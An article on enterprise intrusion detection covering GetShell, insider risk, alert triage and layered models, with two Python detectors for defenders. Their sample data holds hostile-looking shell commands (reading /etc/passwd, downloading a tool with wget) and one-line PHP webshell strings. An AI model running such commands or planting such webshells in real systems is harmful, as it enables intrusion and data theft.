How do you know whether your enterprise has been compromised? Has it really not been compromised, or has the intrusion simply not been discovered yet because your visibility is insufficient? Intrusion detection is a serious challenge that every large Internet enterprise must face. The more valuable a company is, the greater the threat of intrusion. Even Yahoo, one of the originators of the Internet, was still dealing with the theft of its entire user database when it was acquired. Security is no small matter: once an Internet company is successfully "invaded", the consequences can be unimaginable.
Definition of intrusion
We can define an intrusion as follows: an attacker controls and uses our resources (including but not limited to reading and writing data, executing commands and controlling resources) for their own purposes without authorization. In a broad sense, an attacker exploiting a SQL injection vulnerability to steal data, obtaining the account password for the target domain name at the ISP and tampering with DNS so that it points at a defacement page, or finding the target's social accounts and taking unauthorized control of virtual assets on microblog, QQ or mailbox accounts all fall within the scope of intrusion.
Intrusion detection for enterprises
The scope of enterprise intrusion detection is narrower in most cases: it generally refers to attackers gaining control of PCs, systems, servers and networks (including office networks and production networks).
The most common way for attackers to control PCs, servers and other host assets is to execute commands through a shell. The action of obtaining that shell is called GetShell.
For example, an attacker obtains a WebShell through a file upload vulnerability in a web service, or directly executes commands or code through an RCE vulnerability (an RCE environment is effectively a shell in disguise). Another typical route is to implant a Trojan backdoor by some means and then use the shell function built into the Trojan to remotely control the target.
Therefore, intrusion detection can focus on the GetShell action itself and on the malicious behavior that follows a successful GetShell (to expand their results, most attackers use the shell to perform reconnaissance, search for and steal data, and move laterally to attack other internal targets; these behaviors are also important features that distinguish attackers from legitimate users).
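The post-GetShell pattern described above (a web-serving process spawning a shell that then runs reconnaissance, lateral-movement or download commands) can be turned into a concrete behavioral check. The following is an added example and not code from the original article: a small Python detector over process-execution audit events. The event field names (parent, comm, cmdline, user), the process and command lists, and the sample events themselves are all constructed for the example.

```python
# Added example: behavioural detection of post-GetShell activity.
# Event schema (parent, comm, cmdline, user) is an assumption modelled loosely
# on EDR/auditd process-execution records; all sample data is constructed.
import shlex
from typing import Dict, List

# Processes that serve web requests; they have no routine reason to spawn a shell.
WEB_PARENTS = {"nginx", "apache2", "httpd", "php-fpm", "java", "node"}
SHELLS = {"sh", "bash", "dash", "zsh"}

# Command names grouped by the post-GetShell stage they usually indicate.
RECON = {"whoami", "id", "uname", "hostname", "ifconfig", "ip", "netstat", "ss", "ps", "cat"}
LATERAL = {"ssh", "scp", "smbclient", "mysql", "redis-cli"}
DOWNLOAD = {"curl", "wget"}

# Constructed audit events, one per process execution (not real data).
SAMPLE_EVENTS: List[Dict] = [
    {"id": 1, "parent": "php-fpm", "comm": "sh",
     "cmdline": "sh -c 'id; uname -a; cat /etc/passwd'", "user": "www-data"},
    {"id": 2, "parent": "nginx", "comm": "nginx",
     "cmdline": "nginx -g 'daemon off;'", "user": "www-data"},
    {"id": 3, "parent": "java", "comm": "bash",
     "cmdline": "bash -c 'ssh deploy@10.0.0.7 cat /opt/app/config.yml'", "user": "tomcat"},
    {"id": 4, "parent": "cron", "comm": "sh",
     "cmdline": "sh -c 'uname -a'", "user": "root"},
    {"id": 5, "parent": "apache2", "comm": "sh",
     "cmdline": "sh -c 'wget http://203.0.113.9/tool -O /tmp/tool'", "user": "www-data"},
]


def _command_names(cmdline: str) -> List[str]:
    """Return the command names in a command line, expanding `sh -c '...'` bodies."""
    try:
        words = shlex.split(cmdline)
    except ValueError:
        words = cmdline.split()
    names = [words[0]] if words else []
    # Each ;, |, && or || separated segment inside the -c body is its own command.
    if "-c" in words and words.index("-c") + 1 < len(words):
        body = words[words.index("-c") + 1]
        for seg in body.replace("&&", ";").replace("||", ";").replace("|", ";").split(";"):
            toks = seg.split()
            if toks:
                names.append(toks[0])
    # Normalise /usr/bin/id -> id so the sets above match.
    return [n.rsplit("/", 1)[-1] for n in names]


def detect_getshell(events: List[Dict]) -> List[Dict]:
    """Alert when a web-serving process spawns a shell; grade by what the shell runs."""
    alerts = []
    for ev in events:
        if ev["parent"] not in WEB_PARENTS or ev["comm"] not in SHELLS:
            continue
        names = set(_command_names(ev["cmdline"]))
        stages = []
        if names & RECON:
            stages.append("recon")
        if names & LATERAL:
            stages.append("lateral")
        if names & DOWNLOAD:
            stages.append("download")
        alerts.append({
            "event_id": ev["id"],
            "parent": ev["parent"],
            "user": ev["user"],
            # Any shell from a web process deserves a look; known stages raise it.
            "severity": "high" if stages else "medium",
            "stages": stages,
            "commands": sorted(names & (RECON | LATERAL | DOWNLOAD)),
        })
    return alerts


if __name__ == "__main__":
    for alert in detect_getshell(SAMPLE_EVENTS):
        print(alert)
```

Event 4 is the same `uname -a` as a cron job and is deliberately not flagged: the rule keys on the parent process, which is what makes the behavior suspicious, rather than on the command alone.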
Once we treat being "attacked" as the normal state, we have to solve problems under that normal state: which hardening measures can be applied, and which of them can be kept running as routine operations. Any measure that cannot be made routine, for example one that needs many people working overtime to temporarily fend off an attack, will most likely fade away before long. A strategy of that kind is no different in essence from having no strategy at all.
“Invasion” and “Insider”
A scenario close to intrusion is the "insider". Intrusion itself is a means; GetShell is only the starting point, and the attacker's goal after GetShell is to control resources and steal data. "Insiders", by contrast, naturally hold legitimate authority and can legally access sensitive assets, but they illegally dispose of these resources for purposes other than work, including making copies, transferring and leaking data, or tampering with data for profit.
Insider behavior is not within the scope of "intrusion detection". It is generally managed and audited from the perspective of internal risk control, through measures such as separation of duties and dual review, with data leakage prevention (DLP) products as a supporting tool; it is not discussed further here.
Sometimes an attacker knows that employee A has access to the target asset, attacks A specifically, and then steals the data using A's permissions. This is still classified as an "intrusion"; after all, A is not a malicious "insider". If the attack on A cannot be caught at the moment it happens, and the data the attacker pulls through A's account cannot be distinguished from the data A accesses normally, then intrusion detection has also failed.
Common invasion methods and countermeasures
Without understanding attackers' common intrusion methods, it is hard to set the right targets, and it is easy to fall into the trap of "political correctness". For example, a penetration test team says "we did action A and you did not detect it, so your detection is inadequate". In reality, that scenario may not be a complete intrusion chain, and missing that single action may have no impact on the overall detection result. Professional experience is needed to judge how much harm each attack vector can cause the company, how to rank its probability of occurrence, and how to weigh the cost and benefit of covering each vector.
Basic principles of intrusion detection
A model whose alerts are not all followed up thoroughly is equivalent to an invalid model. After an intrusion, it often turns out that there were warnings before the damage was done, but too many of them were never followed up or investigated. Being wise after the event in this way means the team did not actually have the ability to discover the intrusion. That is why security operators often feel helpless with products that produce thousands of alerts every day.
We must suppress similar alerts that recur repeatedly in order to focus on closing each remaining alert. This produces a whitelist, and a whitelist means false negatives. Therefore, false negatives in the model are inevitable.
Since every model will have false negatives, we must build multiple models along multiple dimensions, so that they form associations and give the detection depth. Suppose the static text analysis of a WebShell is bypassed by an attacker's transformation of the file; the malicious calls it makes can still be monitored in the RASP (runtime) layer. In this way you can accept the false negatives of a single model while retaining the ability to discover the intrusion as a whole.
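The two principles above, that a whitelist is an accepted false negative and that several independent models should overlap, can be shown in code. The following is an added example and not part of the original article: a static text model and a RASP-style runtime-call model are run over constructed files and events, their hits are correlated by script path, and an analyst whitelist suppresses a known case while counting each suppression instead of dropping it silently. The file paths and contents, the event fields, the patterns and the whitelist entries are all assumptions made for the example.

```python
# Added example: correlating two detection models and accounting for whitelist
# suppressions. All files, events, patterns and whitelist entries are constructed.
import re
from collections import Counter
from typing import Dict, List, Set, Tuple

# Model 1: static text analysis of files in the web root. It only matches
# recognisable dangerous constructs, so a transformed script can slip past it.
STATIC_PATTERNS = [
    re.compile(r"\beval\s*\(\s*\$_(POST|GET|REQUEST)"),
    re.compile(r"\b(system|passthru|shell_exec)\s*\(\s*\$_(POST|GET|REQUEST)"),
]

# Constructed files. b.php stands for a script whose source gives the static
# patterns nothing to match (its body is deliberately not spelled out).
SAMPLE_FILES: Dict[str, str] = {
    "/var/www/html/index.php": "<?php echo 'hello'; ?>",
    "/var/www/html/uploads/a.php": "<?php eval($_POST['c']); ?>",
    "/var/www/html/uploads/b.php": "<?php /* transformed script body; static patterns find nothing here */ ?>",
    "/var/www/html/admin/tools.php": "<?php system($_GET['cmd']); ?>",  # legacy page known to the team
}

# Model 2: runtime hook events, one per sensitive function call made inside the
# PHP process, attributed to the script file that made the call.
DANGEROUS_CALLS = {"system", "exec", "passthru", "shell_exec", "popen", "proc_open"}
SAMPLE_RUNTIME_EVENTS: List[Dict] = [
    {"script": "/var/www/html/uploads/b.php", "call": "system", "arg": "id"},
    {"script": "/var/www/html/admin/tools.php", "call": "system", "arg": "df -h"},
    {"script": "/var/www/html/index.php", "call": "file_get_contents", "arg": "/tmp/cache"},
]

# Whitelist entries are explicit (model, path) pairs an analyst closed after
# investigation. Each one is an accepted false negative for that model.
WHITELIST: Set[Tuple[str, str]] = {
    ("static", "/var/www/html/admin/tools.php"),
    ("runtime", "/var/www/html/admin/tools.php"),
}


def static_model(files: Dict[str, str]) -> Set[str]:
    """Paths whose content matches a known dangerous construct."""
    return {path for path, body in files.items()
            if any(p.search(body) for p in STATIC_PATTERNS)}


def runtime_model(events: List[Dict]) -> Set[str]:
    """Paths of scripts observed making a dangerous call at runtime."""
    return {e["script"] for e in events if e["call"] in DANGEROUS_CALLS}


def correlate(files: Dict[str, str], events: List[Dict]) -> Dict[str, List[str]]:
    """Union of both models keyed by path, recording which model(s) fired."""
    hits: Dict[str, List[str]] = {}
    for path in sorted(static_model(files)):
        hits.setdefault(path, []).append("static")
    for path in sorted(runtime_model(events)):
        hits.setdefault(path, []).append("runtime")
    return hits


def triage(hits: Dict[str, List[str]],
           whitelist: Set[Tuple[str, str]]) -> Tuple[Dict[str, List[str]], Counter]:
    """Drop whitelisted (model, path) pairs but count them so the blind spot is visible."""
    remaining: Dict[str, List[str]] = {}
    suppressed: Counter = Counter()
    for path, models in hits.items():
        kept = [m for m in models if (m, path) not in whitelist]
        suppressed[path] += len(models) - len(kept)
        if kept:
            remaining[path] = kept
    return remaining, suppressed


if __name__ == "__main__":
    hits = correlate(SAMPLE_FILES, SAMPLE_RUNTIME_EVENTS)
    remaining, suppressed = triage(hits, WHITELIST)
    print("alerts to close:", remaining)
    print("accepted false negatives:", dict(suppressed))
```

Here the static model misses b.php and the runtime model never sees a.php, yet both reach the analyst because the two models are combined by path. The whitelist removes tools.php from the queue, and the suppression count is what you would review periodically to decide whether that accepted blind spot is still acceptable.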